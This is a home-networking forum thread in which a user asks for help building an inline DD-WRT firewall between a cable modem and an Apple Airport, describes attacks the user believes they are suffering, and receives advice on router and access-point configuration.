Joined: 01 Sep 2014 Posts: 5 Location: United States
Posted: Mon Sep 01, 2014 2:54 Post subject: Constructing an inline firewall
I'm trying to build an inline (IE: between DEMARC & Router) firewall to protect my network.
The network hardware being used is: "Firewall": Netgear RangeMax Duo, Wireless-N Router WNDR3300. Running Firmware: DD-WRT v24-sp2 (07/22/09) mini
Router: Apple Airport Extreme (802.11n) Generation 1, Model A1143
DEMARC: A coaxial cable modem from Comcast, running on dynamic IP.
So far I haven't had any luck getting the Firewall to work at all. I uploaded the rules with fwbuilder and now the thing appears partially bricked. No ping response and no access to SSH or webconfig. If I connect to it via it's wifi (came back on after reset), though, I can access the internet. I tried the 30/30/30 reset but it seems that did not remove the bad firewall rules or something.
Are you just trying to put another barrier between your modem and the Airport, or are you trying to separate things within your own network? If it's the former, I'm curious why the firewall on the airport is not adequate.
Joined: 01 Sep 2014 Posts: 5 Location: United States
Posted: Mon Sep 01, 2014 12:17 Post subject:
notorious.dds wrote:
Are you just trying to put another barrier between your modem and the Airport, or are you trying to separate things within your own network? If it's the former, I'm curious why the firewall on the airport is not adequate.
I really just need something with flexibility and easily configurable parameters. As far as I know Airport doesn't let you touch the firewall (at least, not easily on a PC), and it actually let some guy get into my VNC (no forwarded ports, he tunneled into my gateway server and compromised it from there). It also doesn't block spoofed DNS attacks, which I get about 20 times a day.
The code they try to run when they break into the VNC usually looks like this:
It's broken because the text field cut it off, luckily...
Anyways, some cheeky guy keeps calling me telling me to type in shit into the run prompt (the usual "your computer is dun broke!" scam). He has my address, name, and phone number, and the last time he called he threatened to kill me/my family/hack me. Pretty much yelling into the phone. So yeah, super fun.
The attack comes in on port 53 (the DNS port) but it isn't a real DNS response, and isn't in response to a DNS request. The packet that's sent to me is malformed, and is actually a check-in message to a trojan virus that was reported to be injected earlier on. The trojan virus checked into their sever after being installed (via a javascript exploit, yay), so their server checks back to activate it and send remote commands.
The amount of attacks I've received are immense, and aren't showing any signs of stopping. I need to buy a REAL firewall and possibly set up a Virtual Private Network to funnel my internet traffic through. They're targeting me based on information that does not correlate with my public IP address, because it's dynamic and they'd be looking at a few people per month on one address. Considering the fact that some guy knows my name, address, and phone number, I don't doubt they could easily track every single activity that isn't encrypted or funneled through a VPN. What might be useful to me is a VPN Firewall/Router combo.
The packets are sent using connectionless UDP usually. UDP doesn't require an established connection, so they can just send packets to whoever they want without permission, as opposed to a TCP connection. Another reason they use UDP is that they can forge their IP address, much like forging a drivers license. You can't trace that kind of IP address back to them because it's fake, and always actually belongs to someone else who didn't do anything wrong.
Even a passworded server, secure computer, and an encrypted/passworded VNC server (apparently!) aren't safe against this. The trojan virus is able to inject itself through even open web pages, requiring you only to open the page just once.
Geez, that's pretty terrible. Given your story, I'm not sure what level of security is needed in your case. At any rate, I can get you where you want to go with your current setup.
Another question I have is regarding the continued use of the Airport. Can I assume you want to keep this in use mainly due to the 802.11AC, or is there some other reason?
Joined: 01 Sep 2014 Posts: 5 Location: United States
Posted: Mon Sep 01, 2014 12:41 Post subject:
notorious.dds wrote:
Geez, that's pretty terrible. Given your story, I'm not sure what level of security is needed in your case. At any rate, I can get you where you want to go with your current setup.
Another question I have is regarding the continued use of the Airport. Can I assume you want to keep this in use mainly due to the 802.11AC, or is there some other reason?
Yeah, the Airport is my most capable WLAN router at the moment.
I'm definitely going to invest ($$$) in more security and hardware later, but for now this is a good temporary ass-covering solution for little cost. I have plans to set up some NID/AV servers using the Raspberry Pi as a network device as well (I've heard it's amazing as network hardware).
If I can't fix this Netgear, I have a good ol' Linksys WRT54G v5 I can use. Well, not quite "good" as the v5 sucks butts, but still better than a brick. Unless, of course, I can beat my attackers to death with it...
Okay, so the easiest solution I can offer is to use the netgear is it's default setup (i.e. router/gateway) and to configure your airport as a wireless access point. You'll have wireless and use of the LAN ports this way, but no routing or firewall through the airport. This should be doable even with stock firmware. (Although, I've found it's not hard to overestimate the configurability of Apple products.)
Another option would be to set up a subnet with the airport. However, this would isolate anything connected to airport from anything connected to the netgear, and it would add anthother routing sequence for all data in and out. Unless it turns out that the first method is not possible with the airport, I don't currently see any advantages to your setup using the second method.
Joined: 01 Sep 2014 Posts: 5 Location: United States
Posted: Mon Sep 01, 2014 14:24 Post subject:
notorious.dds wrote:
Okay, so the easiest solution I can offer is to use the netgear is it's default setup (i.e. router/gateway) and to configure your airport as a wireless access point. You'll have wireless and use of the LAN ports this way, but no routing or firewall through the airport. This should be doable even with stock firmware. (Although, I've found it's not hard to overestimate the configurability of Apple products.)
Ooh, that sounds like it would make everything a lot easier. So instead of funneling the WAN though the Firewall to the WLAN Router, instead just make the Firewall the router and make the WLAN Router just an AP?
I think there might be a slight speed decrease associated with that, though. The data interchange between the two devices would theoretically be a lot higher than if the WLAN Router handled the routing and DHCP. I'm mostly worried about the capacity of the NIC's.
notorious.dds wrote:
Another option would be to set up a subnet with the airport. However, this would isolate anything connected to airport from anything connected to the netgear, and it would add anthother routing sequence for all data in and out. Unless it turns out that the first method is not possible with the airport, I don't currently see any advantages to your setup using the second method.
That's also a great option, and is what I was trying to do initially.
I think there might be a slight speed decrease associated with that, though. The data interchange between the two devices would theoretically be a lot higher than if the WLAN Router handled the routing and DHCP. I'm mostly worried about the capacity of the NIC's.
The speed loss in inevitable so long as you're using firewall on the netgear. It will be your bottleneck. You can turn off DHCP on the netgear and turn it on at the Airport running as an AP, but I don't thing it'll help you much.
Option 2 will allow you to avoid the bottleneck for intranet traffic, but you'll hit it with anything going outside.
My recommendation: Use the first option, but find a router that has a gigabit switch instead of the 10/100 which is on that WNDR3300. I've seen them on Ebay for under $40.
I guess it may be possible to insert the netgear's firewall capabilities between the WAN and LAN of the airport, but that's beyond my understanding... and I still don't see how you would avoid it's hardware limitations...
